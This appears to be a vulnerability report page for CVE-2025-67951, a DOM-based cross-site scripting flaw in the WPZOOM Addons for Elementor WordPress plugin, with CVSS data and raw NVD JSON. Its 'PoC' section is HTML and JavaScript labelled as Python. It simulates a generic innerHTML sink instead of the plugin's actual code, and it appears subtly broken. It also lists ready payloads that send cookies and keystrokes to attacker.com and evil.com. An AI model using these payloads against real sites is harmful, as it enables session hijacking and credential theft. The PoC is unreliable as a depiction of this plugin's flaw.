Security Vulnerability Report
中文
CVE-2025-67951 CVSS 6.5 MEDIUM

CVE-2025-67951

Published: 2025-12-16 09:16:00
Last Modified: 2026-04-15 00:35:42

Description

Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting') vulnerability in WPZOOM WPZOOM Addons for Elementor wpzoom-elementor-addons allows DOM-Based XSS.This issue affects WPZOOM Addons for Elementor: from n/a through <= 1.2.10.

CVSS Details

CVSS Score
6.5
Severity
MEDIUM
CVSS Vector
CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:C/C:L/I:L/A:L

Configurations (Affected Products)

No configuration data available.

WPZOOM Addons for Elementor <= 1.2.10

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
python
<!-- CVE-2025-67951 PoC - DOM-based XSS in WPZOOM Addons for Elementor --> <!-- This PoC demonstrates the DOM-based XSS vulnerability --> <!-- Attack Scenario: Inject malicious JavaScript via URL parameter --> <!DOCTYPE html> <html> <head> <title>CVE-2025-67951 PoC</title> </head> <body> <h1>CVE-2025-67951 DOM-based XSS PoC</h1> <p>Vulnerable Parameter: The vulnerability exists in the frontend JavaScript of wpzoom-elementor-addons plugin.</p> <!-- Attack URL Example --> <h2>Attack URL:</h2> <pre id="attack-url"></pre> <script> // Simulate vulnerable code pattern in wpzoom-elementor-addons function simulateVulnerableCode() { // Get URL parameter without sanitization const params = new URLSearchParams(window.location.search); const userInput = params.get('widget_data') || params.get('id'); // Vulnerable: Direct injection into DOM without encoding if (userInput) { document.getElementById('output').innerHTML = userInput; } } // Generate attack URL const attackPayload = '<img src=x onerror="alert(String.fromCharCode(88,83,83,32,69,120,112,108,111,105,116,101,100));"> '; const attackURL = window.location.origin + window.location.pathname + '?widget_data=' + encodeURIComponent(attackPayload); document.getElementById('attack-url').textContent = attackURL; // Execute PoC simulateVulnerableCode(); </script> <!-- Alternative Attack Payloads --> <h2>Alternative Payloads:</h2> <pre> 1. Cookie Theft: <script>fetch('https://attacker.com/steal?c='+document.cookie)</script> 2. Session Hijacking: <img src=x onerror="document.location='https://evil.com/log?cookie='+document.cookie"> 3. Keylogger: <script>document.onkeypress=function(e){fetch('https://attacker.com/k?k='+e.key)}</script> </pre> <div id="output" style="margin: 20px; padding: 10px; border: 1px solid #ccc;"></div> </body> </html>

References

Raw JSON Data

JSON
{"cve": {"id": "CVE-2025-67951", "sourceIdentifier": "[email protected]", "published": "2025-12-16T09:15:59.717", "lastModified": "2026-04-15T00:35:42.020", "vulnStatus": "Deferred", "cveTags": [], "descriptions": [{"lang": "en", "value": "Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting') vulnerability in WPZOOM WPZOOM Addons for Elementor wpzoom-elementor-addons allows DOM-Based XSS.This issue affects WPZOOM Addons for Elementor: from n/a through <= 1.2.10."}], "metrics": {"cvssMetricV31": [{"source": "134c704f-9b21-4f2e-91b3-4a467353bcc0", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:C/C:L/I:L/A:L", "baseScore": 6.5, "baseSeverity": "MEDIUM", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "LOW", "userInteraction": "REQUIRED", "scope": "CHANGED", "confidentialityImpact": "LOW", "integrityImpact": "LOW", "availabilityImpact": "LOW"}, "exploitabilityScore": 2.3, "impactScore": 3.7}]}, "weaknesses": [{"source": "[email protected]", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-79"}]}], "references": [{"url": "https://patchstack.com/database/Wordpress/Plugin/wpzoom-elementor-addons/vulnerability/wordpress-wpzoom-addons-for-elementor-plugin-1-2-10-cross-site-scripting-xss-vulnerability?_s_id=cve", "source": "[email protected]"}]}}